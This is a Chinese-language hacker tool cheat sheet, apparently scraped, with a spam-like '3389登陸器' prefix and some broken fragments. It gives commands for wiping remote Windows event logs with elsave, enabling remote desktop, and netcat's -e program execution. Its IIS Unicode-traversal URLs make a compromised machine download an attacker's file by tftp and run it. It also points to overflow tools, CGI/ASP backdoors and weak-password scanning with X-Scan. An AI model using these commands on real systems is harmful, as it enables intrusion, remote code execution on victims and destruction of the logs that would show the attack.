3389登陸器 elsave.exe
3389登陸器事件日志清除工具
elsave -s //IP地址 -l "application" -C
elsave -s //IP地址 -l "system" -C
elsave -s //IP地址 -l "security" -C
執行后成功清除應用程序日志,系統日志,安全日志
3389登陸器hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot [/r]
使用/r表示安裝完成后自動重起目標使設置生效。
3389登陸器nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處: nc [-options] hostname port[s] [ports] ...
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用于入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用于掃描時
3389登陸器 TFTPD32.EXE
把自己的電腦臨時變為一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:/winnt/system32/文件名
然后可以直接令文件運行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdASP/' target='_blank' class='infotextkey'asp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然后用IE瀏覽器連接。
一、一 Xscan命令行運行參數說明:
在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據后提前退出程序,按"
1.命令格式: xscan -host 起始IP[-終止IP] 檢測項目 [其他選項]
xscan -file 主機列表文件名 檢測項目 [其他選項]
其中檢測項目 含義如下:
-port : 檢測常用服務的端口狀態(可通過/dat/config.ini文件的"PORT-SCAN-OPTIONS/PORT-LIST"項定制待檢測端口列表);
-ftp : 檢測FTP弱口令(可通過/dat/config.ini文件設置用戶名/密碼字典文件);
-ntpass : 檢測NT-Server弱口令(可通過/dat/config.ini文件設置用戶名/密碼字典文件);
-cgi : 檢測CGI漏洞(可通過/dat/config.ini文件的"CGI-ENCODE/encode_type"項設置編碼方案);
-iis : 檢測IIS漏洞(可通過/dat/config.ini文件的"CGI-ENCODE/encode_type"項設置編碼方案);
[其他選項] 含義如下:
-v: 顯示詳細掃描進度
-p: 跳過Ping不通的主機
-o: 跳過沒有檢測到開放端口的主機
-t 并發線程數量[,并發主機數量]: 指定最大并發線程數量和并發主機數量, 默認數量為100,10